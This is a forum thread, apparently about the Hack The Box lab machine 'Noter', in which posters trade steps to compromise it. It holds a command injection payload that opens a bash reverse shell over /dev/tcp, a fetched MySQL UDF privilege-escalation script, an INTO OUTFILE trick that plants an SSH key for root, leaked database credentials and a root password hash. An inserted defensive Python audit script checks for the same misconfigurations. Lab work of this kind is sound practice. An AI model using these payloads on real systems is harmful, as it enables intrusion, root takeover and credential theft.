Posts: 22 Threads: 0 Joined: N/A

(May 8, 2022, 10:01 PM)unlawz Wrote: nudge root?

(May 9, 2022, 12:01 AM)Exited3n Wrote:
    # Config MySQL
    app.config['MYSQL_HOST'] = 'localhost'
    app.config['MYSQL_USER'] = 'root'
    app.config['MYSQL_PASSWORD'] = 'Nildogg36'
    app.config['MYSQL_DB'] = 'app'
    app.config['MYSQL_CURSORCLASS'] = 'DictCursor'

(May 9, 2022, 01:06 AM)unlawz Wrote: Yes, but I don't know how to approach it. I don't understand what I have to do

(May 9, 2022, 01:08 AM)Exited3n Wrote:
    mysql -u root -p
    use mysql;

(May 9, 2022, 04:47 AM)NoobHTB Wrote: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) - Linux local Exploit (exploit-db.com) I tried this, and it failed. Anyone can help me? Thanks in advance.
    create function do_system returns integer soname 'raptor_udf2.so';

if you search correctly you will find a python version of that exploit

Posts: 43 Threads: 0 Joined: N/A

(May 9, 2022, 04:54 AM)iphonedox Wrote: if you search correctly you will find a python version of that exploit

You can use this python script

Posts: 51 Threads: 0 Joined: N/A

For root, download the python script https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py
    python udf_root.py --username root --password Nildogg36
    ./sh -p
and then we have a sh file u+s, run this to get root. Thanks to @iphonedox for the hint.
    cat /etc/passwd
    root:$6$09RSjU3jIh/2JW1u$8jlcYzW5Oyzgh/TrlTPX5Wq2HMTA6zUooij/9j0.NIttTYp4x0h6wmq8chrcdtvNpZzHlHzwsI8GesOKI3NYn.:18991:0:99999:7:::

Posts: 213 Threads: 0 Joined: N/A

Here is another way to get root:
    select "YOUR PUBLIC KEY" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY ' ';
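
Added defensive example, not part of any post in this thread: a Python check for the conditions the two root paths above depend on, namely the web app connecting to MySQL as root with the password stored in source and, as assumptions about the server side that the thread does not show, mysqld running as OS root with an empty secure_file_priv. The sample inputs, function names and finding names are constructed for illustration.

```python
import re

# Constructed sample inputs (not copied from the machine discussed in the thread).
APP_SOURCE = """
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'example-password'
app.config['MYSQL_DB'] = 'app'
"""
MYSQLD_CNF = """
[mysqld]
user = root
secure-file-priv = ""
plugin_dir = /usr/lib/mysql/plugin
"""

# Matches Flask-style assignments of string literals to MYSQL_* config keys.
CONFIG_RE = re.compile(
    r"app\.config\[['\"](MYSQL_\w+)['\"]\]\s*=\s*['\"]([^'\"]*)['\"]")

def parse_mysqld(cnf):
    """Return [mysqld] options as a dict; '-' and '_' are equivalent in names."""
    opts, section = {}, None
    for line in cnf.splitlines():
        line = line.strip()
        if not line or line[0] in "#;!":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "mysqld":
            key, _, value = line.partition("=")
            opts[key.strip().lower().replace("-", "_")] = value.strip().strip("'\"")
    return opts

def audit(app_source, cnf):
    """Return a sorted list of finding names for the app and server config."""
    findings = set()
    app = dict(CONFIG_RE.findall(app_source))
    if app.get("MYSQL_USER") == "root":
        findings.add("app-connects-as-mysql-root")       # full privileges, incl. FILE
    if app.get("MYSQL_PASSWORD"):
        findings.add("db-password-hardcoded-in-source")  # leaks with any source backup
    opts = parse_mysqld(cnf)
    if opts.get("user") == "root":
        findings.add("mysqld-runs-as-os-root")           # server-written files are root-owned
    if opts.get("secure_file_priv") == "":               # explicit empty value only; when
        findings.add("outfile-path-unrestricted")        # unset, check SHOW VARIABLES
    return sorted(findings)

if __name__ == "__main__":
    print("\n".join(audit(APP_SOURCE, MYSQLD_CNF)))
```

A dedicated low-privilege database account, a password read from the environment, `user = mysql` and a non-empty `secure_file_priv` directory produce an empty findings list.
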

Posts: 51 Threads: 0 Joined: N/A

Writeup: HTB: Noter – Syn's writeups (synisl33t.com)
Password: root:$6$09RSjU3jIh/2JW1u$8jlcYzW5Oyzgh/TrlTPX5Wq2HMTA6zUooij/9j0.NIttTYp4x0h6wmq8chrcdtvNpZzHlHzwsI8GesOKI3NYn.:18991:0:99999:7:::
I can't root if I haven't the hint from guys. Thanks for helping me. (P/S: sorry for bad English)

Posts: 213 Threads: 0 Joined: N/A

(May 9, 2022, 07:24 AM)Exa Wrote: Here is another way to get root:
    select "YOUR PUBLIC KEY" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY ' ';

(May 9, 2022, 07:39 AM)jon01 Wrote: can anyone tell me how did we find this exploit? don't know: as a user we can dump databases: is this why

Did you find the MySQL root credentials in app.py?

Posts: 21 Threads: 0 Joined: N/A

(May 8, 2022, 06:37 PM)Exa Wrote: So I think I got code execution. My test.md file contains:
    a'; sleep 10; echo 'a

(May 8, 2022, 06:40 PM)hackerman Wrote: nice find, the ' breaks apart $' ' Able to get shell with this

(May 8, 2022, 06:49 PM)Exa Wrote: So with this I get a reverse shell:
    a'; bash -i >& /dev/tcp/10.10.xxx.xxx/4000 0>&1; echo 'a
    svc@noter:~/app/web$ id
    id
    uid=1001(svc) gid=1001(svc) groups=1001(svc)
    svc@noter:~/app/web$ cat /home/svc/user.txt
Okay, so the MySQL credentials from app_backup_1635803546.zip can be used to connect to port 3306. Anything interesting there?

I get "bash: cannot set terminal process group (1245): Inappropriate ioctl for device" 400 - when going for reverse shell. There is interaction but I can't get the shell, any advice?

Posts: 17 Threads: 0 Joined: N/A

(May 8, 2022, 12:13 AM)Peter Wrote: xss in username field and password field

(May 8, 2022, 01:16 AM)xslsystem Wrote: I don't understand how can find xss :( I found some XSS in ckeditor but the cookie is blocked

(May 8, 2022, 08:57 AM)jon01 Wrote:
PLAY WITH COOKIE

Thanks

Posts: 5 Threads: 0 Joined: N/A

(May 9, 2022, 05:49 AM)NoobHTB Wrote: For root, download the python script https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py
    python udf_root.py --username root --password Nildogg36
    ./sh -p
and then we have a sh file u+s, run this to get root. Thanks to @iphonedox for the hint.
    cat /etc/passwd
    root:$6$09RSjU3jIh/2JW1u$8jlcYzW5Oyzgh/TrlTPX5Wq2HMTA6zUooij/9j0.NIttTYp4x0h6wmq8chrcdtvNpZzHlHzwsI8GesOKI3NYn.:18991:0:99999:7:::

Please can you tell me why the "-p" flag works, or what it's doing? I did everything else up to this point on my own but came to have a snoop here when running ./sh wasn't doing anything and that flag worked, so would love to know why it's necessary. :)

Posts: 9 Threads: 0 Joined: N/A

Hello,
for the user flag, is it necessary to modify the code of app.py?
Thanks